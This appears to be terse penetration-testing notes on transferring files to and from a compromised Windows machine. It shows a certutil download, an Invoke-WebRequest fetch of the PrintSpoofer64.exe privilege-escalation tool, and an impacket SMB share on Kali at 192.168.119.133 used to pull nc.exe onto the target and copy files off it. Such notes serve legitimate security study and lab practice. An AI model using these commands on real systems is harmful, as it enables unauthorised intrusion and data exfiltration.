To Windows
Last updated
Last updated
Certutil
certutil -urlcache -f <file> <path to paste>
Invoke
$ProgressPreference = "SilentlyContinue”
Invoke-WebRequest -URI -OutFile PrintSpoofer64.exe
SMB server
cd to dir which you want to share
impacket-smbserver share . -smb2support
on window
to check dir \\192.168.119.133\share
to copy from window copy <file> \\192.168.119.133\share\
to copy from kali copy \\192.168.119.133\share\nc.exe <path to paste>